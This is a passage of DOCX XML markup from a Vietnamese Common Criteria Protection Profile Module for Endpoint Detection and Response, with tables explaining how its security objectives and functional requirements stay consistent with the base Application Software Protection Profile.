              <w:t>Giả định này nhất quán với Hồ sơ bảo vệ cơ sở vì giả định tính khả dụng của mạng nhất quán với giả định A.PLATFORM được xác định bởi Hồ sơ bảo vệ cơ sở, giả định này mong muốn TOE có một nền tảng điện toán đáng tin cậy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38A479C2" w14:textId="74C87292" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10.1.3 Tính nhất quán của các mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFEA3C" w14:textId="4D54741C" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Các mục tiêu cho TOE nhất quán với </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Hồ sơ bảo vệ cho phần mềm ứng dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>dựa trên lý do sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3072"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="44D03250" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6129C2B5" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Mối đe dọa, Giả định, OSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A1F7B77" w14:textId="77777777" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Đặc điểm về tính nhất quán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="527C2B8A" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0226F5BE" w14:textId="71DA1531" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>O.ACCOUNTABILITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAE22DC" w14:textId="05A15F88" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Mục tiêu này liên quan đến khả năng TOE xác định và xác thực người dùng và ghi lại hành vi của những người dùng này. Hồ sơ bảo vệ cơ sở không xác định cơ chế xác thực nên mục tiêu này không ảnh hưởng đến việc thực thi các SFR của Hồ sơ bảo vệ cơ sở.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="5F0F7A3C" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009F20E8" w14:textId="510413A0" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>O.EDR_MANAGEMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BE1A9A" w14:textId="38BCD74F" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>Mục tiêu này mở rộng mục tiêu O.EDR.MANAGEMENT của Hồ sơ bảo vệ cơ sở bằng cách hỗ trợ các chức năng quản lý dành riêng cho loại EDR TOE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004624D5" w:rsidRPr="00204C5F" w14:paraId="75906D43" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:trPr>
          <w:trHeight w:val="251"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FD13193" w14:textId="7E61517B" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>O.PROTECTED_TRANSIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4767D62E" w14:textId="6C2757B2" w:rsidR="004624D5" w:rsidRPr="00204C5F" w:rsidRDefault="004624D5" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">O.PROTECTED _COMMS của Hồ sơ bảo vệ cơ sở bằng cách đảm bảo rằng các thông tin liên lạc liên quan đến EDR và </w:t>
            </w:r>
            <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
              <w:t>Tác nhân</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> máy chủ đã đăng ký được </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:t>đảm bảo an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> theo cách tương tự như dữ liệu nhạy cảm khác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0946E1C7" w14:textId="546DEFA4" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Các mục tiêu cho Môi trường hoạt động của TOE nhất quán với </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> dựa trên Đặc điểm sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="198" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2875"/>
        <w:gridCol w:w="7009"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="5D243C1C" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D59EE84" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Môi trường hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E20031C" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Đặc điểm về tính nhất quán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="101F0A5F" w14:textId="77777777" w:rsidTr="00BD2F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5222F096" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>OE.RELIABLE_TRANSIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21749258" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="vi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>Mục tiêu này liên quan đến một giao diện bên ngoài không tồn tại trong Hồ sơ bảo vệ cơ sở và không ảnh hưởng đến chức năng của Hồ sơ bảo vệ cơ sở.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35C6307C" w14:textId="6FB324EB" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10.1.4 Tính nhất quán của các yêu cầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3EC530" w14:textId="5E23EE9E" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PP-Module xác định một số SFR từ </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cần thiết để hỗ trợ chức năng Phát hiện và phản hồi điểm cuối (EDR). Điều này được coi là nhất quán vì chức năng do </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cung cấp đang được sử dụng cho mục đích đã định. Đặc điểm tại sao điều này không mâu thuẫn với các tuyên bố do </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> xác định như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10170" w:type="dxa"/>
        <w:tblInd w:w="198" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="7290"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="2D2FA19E" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1938AA49" w14:textId="67803567" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Yêu cầu PP-Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1A8365" w14:textId="6D7B15B7" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Đặc điểm về tính nhất quán</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="264B6DF9" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="175801D8" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SFR sửa đổi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="7EF1F24D" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="36C6AD45" w14:textId="6A3651F4" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">PP-Module này không sửa đổi bất kỳ yêu cầu nào khi </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> là cơ sở.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="6EA2508B" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10170" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="22E963B1" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>SFR bắt buộc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="33E33D34" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F8DD21" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FAU_ALT_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D4825E9" w14:textId="435A8C27" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="vi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:t>SFR này xác định các cảnh báo có thể kiểm tra được cho EDR. Không ảnh hưởng đến chức năng [</w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="1F8E83F1" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FAFBA66" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FAU_COL_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="144E6BE9" w14:textId="6572E303" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>SFR này xác định dữ liệu sự kiện tối thiểu mà EDR thu thập từ Tác nhân máy chủ. Không ảnh hưởng đến chức năng [</w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t>].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="066367A9" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3968742A" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FAU_GEN.1/EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773D5143" w14:textId="3ED32ABA" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định dữ liệu sự kiện tối thiểu mà máy chủ EDR phải ghi lại về hoạt động của bảng điều khiển quản lý được ủy quyền. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="6A282838" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8C7CA9" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FIA_AUT_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E97370F" w14:textId="14345C6E" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định cơ chế xác thực cho EDR. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="5718C6FB" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219BCA28" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FIA_PWD_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A723E4" w14:textId="768E1D42" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định tiêu chí xác thực cụ thể cho mật khẩu. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="5CC7A07D" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C966D6A" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SMF.1/ENDPOINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F05A5E" w14:textId="78889A14" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một bộ cụ thể các chức năng quản lý cho một EDR bởi một EDR. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="3A31C990" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7164BB2A" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SMF.1/HOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406D3FB5" w14:textId="30F80EB9" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một bộ cụ thể các chức năng quản lý cho Tác nhân máy chủ bởi một EDR. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="190DB712" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="230E65BE" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SMR.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A61E7FC" w14:textId="013656E5" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một nhóm vai trò quản lý cụ thể cho một EDR. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77645" w:rsidRPr="00204C5F" w14:paraId="56DB3FA3" w14:textId="77777777" w:rsidTr="007003B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E34DF38" w14:textId="77777777" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t>FMT_SRF_EXT.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7290" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D642B3B" w14:textId="31594787" w:rsidR="00C77645" w:rsidRPr="00204C5F" w:rsidRDefault="00C77645" w:rsidP="00BD2F41">
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve">SFR này xác định một bộ chức năng khắc phục cụ thể cho EDR. Không ảnh hưởng đến chức năng [ </w:t>
            </w:r>
            <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
              <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
